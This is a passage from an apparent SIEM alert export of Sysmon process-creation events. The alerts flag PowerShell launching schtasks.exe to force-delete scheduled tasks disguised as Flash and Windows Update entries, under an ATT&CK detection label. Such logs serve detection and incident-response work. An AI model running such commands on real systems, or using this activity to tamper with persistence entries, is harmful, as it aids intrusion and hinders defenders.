schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN AdobeFlashPlayer /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN AdobeFlashPlayer /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.875132100Z"",""eventRecordID"":""3052"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.862\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-0010eff22600}\r\nProcessId: 1552\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN AdobeFlashPlayer /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 
1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.862"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-0010eff22600}"",""processId"":""1552"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN AdobeFlashPlayer /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.667",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.805 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-00106aef2600} 
+ProcessId: 7692 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.821239000Z"",""eventRecordID"":""3051"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.805\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-00106aef2600}\r\nProcessId: 7692\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.805"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-00106aef2600}"",""processId"":""7692"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.654",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.758 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001031eb2600} +ProcessId: 5556 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate2 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.795583200Z"",""eventRecordID"":""3050"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.758\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001031eb2600}\r\nProcessId: 5556\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.758"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-001031eb2600}"",""processId"":""5556"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.637",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.717 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001086e72600} +ProcessId: 7420 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.747247900Z"",""eventRecordID"":""3049"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.717\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001086e72600}\r\nProcessId: 7420\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:00.717"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-001086e72600}"",""processId"":""7420"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.622",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.658 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001094e42600} +ProcessId: 4908 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update_windows /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 
+IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update_windows /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.668462200Z"",""eventRecordID"":""3048"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.658\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001094e42600}\r\nProcessId: 4908\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update_windows /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 
6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.658"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-001094e42600}"",""processId"":""4908"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update_windows /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.606",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.615 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001058e22600} +ProcessId: 1124 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe 
+CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Windows_Update /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Windows_Update /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.618171800Z"",""eventRecordID"":""3047"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.615\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001058e22600}\r\nProcessId: 1124\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Windows_Update /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 
1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.615"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-001058e22600}"",""processId"":""1124"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Windows_Update /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.590",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.562 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001012e02600} +ProcessId: 
